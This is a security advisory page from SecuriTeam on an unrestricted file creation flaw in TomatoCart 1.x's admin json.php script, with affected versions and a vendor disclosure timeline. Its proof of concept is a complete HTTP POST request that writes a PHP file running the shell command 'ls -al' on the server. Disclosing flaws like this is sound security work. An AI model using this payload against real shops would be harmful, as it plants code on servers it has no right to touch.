TomatoCart Unrestricted File Creation Exploit

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Home
Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

Confidence 2013

5% Off any SANS course
Use Code: SecuriTeam_5

Hack In Paris

La Nuit du Hack

Subjects of Interest:
Vulnerability Management
SQL Injection
Buffer Overflows
Active Network Scanning
Fuzzing
Fuzzer Report
Network Security
Network Scanner
Pen Testing
Security Scanner

TomatoCart 1.x is prone to a unrestricted file creation vulnerability

Credit:
The information has been provided by Aung Khant.

Free Website Security Scan	Free Fuzzer Report	Vulnerability Assessment
Detect web app vulnerabilities	University study comparing the top	Accurate and automated scanning
Get guidance from professionals.	6 commercially availble fuzzers.	for networks of any size.

Protect your website!
Free Trial, Nothing to install.
No interruption of visitors.
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* TomatoCart 1.x and prior

TomatoCart 1.x versions contain a flaw related to the /admin/json.php script's failure to properly restrict created files. This may allow an attacker to create arbitrary shell script to launch further attacks on the application server.

PROOF-OF-CONCEPT/EXPLOIT
POST /admin/json.php HTTP/1.1
Host: localhost
Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

module=file_manager&action=save_file&file_name=0wned.php&directory=/&token=edfd1d6b88d0c853c2b83cc63aca5e14&ext-comp-1277=0wned.php&content=<?+echo
'<h1>0wned!</h1><pre>';+echo `ls+-al`; ?>

Disclosure Timeline:
2012-04-22: Contacted the vendor through email
2012-04-29: Vendor replied and the vulnerability detail was sent
2013-01-04: Vulnerability not fixed
2013-01-04: Vulnerability disclosed

blog comments powered by Disqus

	SimplyPlay v.66 .pls File Buffer Overflow Exploit
	NProtect Anti-Virus Privilege Escalation Vulnerability
	Ripe HD FLV Player Plugin for WordPress Multiple Script Direct Request Path Disclosure Vulnerability
	CMS snews SQL Injection Vulnerability
	WeBid SQL Injection Exploit
	Invision Gallery SQL Injection Exploit
	ArrowChat External.php Lang Parameter Traversal Local File Inclusion Exploit
	WinWebMail Server Stored XSS Exploit
	TFTP Server for Windows ST WRQ Buffer Overflow Exploit
	QNX QCONN Remote Command Execution Exploit
	Distinct TFTP Writable Directory Traversal Execution Exploit
	Xion Audio Player 1.0.127 (.aiff) Denial of Service Exploit
	Wordpress Postie Plugin Stored XSS Exploit
	Vice City Multiplayer Server Remote Code Execution Exploit
	Sphpforum Multiple Exploits
	NetOp Remote Control Client Buffer Overflow Exploit
	MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Exploit
	MaxForum Local File Inclusion Exploit
	Inferno vBShout SQL Injection Vulnerability
	WP Effective Lead Management Persistent XSS Exploit

Featured Articles

	Social Engine Multiple Exploits
	Novell Groupwise Address Book Remote Code Execution Exploit
	GWebmail XSS & LFI RCE Vulnerabilities
	Acpid Privilege Boundary Crossing Exploit
	McAfee Virtual Technician MVT.MVTControl.6300 ActiveX GetObject() Vulnerability
	'SonicWall Global Management System XSS Vulnerability'
	'Opera file:// Overflow'
	'vxFtpSrv CWD Command Overflow'
	'Kaminsky DNS Cache Poisoning Flaw Exploit for Domains'
	'freeSSHD Post Authentication Buffer Overflow (Exploit)'
	'Symantec Altiris Client Service Local Privilege Escalation (Exploit)'
	'Apple Mac OS X SMB Vulnerabilities (mount_smbfs and smbutil)'
	'SurgeMail Webmail Host Header DoS'
	'PHP Win32std Extension safe_mode/disable_functions Protections Bypass'
	'WinPcap NPF.SYS Privilege Elevation Vulnerability (PoC exploit)'
	'MailEnable Buffer Overflow (LOGIN, Exploit)'
	'Durian Web Application Server Buffer Overflow (Exploit)'
	'KsIRC Buffer Overflow Exploit (PRIVMSG)'
	'Allied Telesyn AT-TFTP Server Filename Buffer Overflow (Exploit)'
	'Windows WorkStation NetpManageIPCConnect (MS06-070, Exploit)'

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs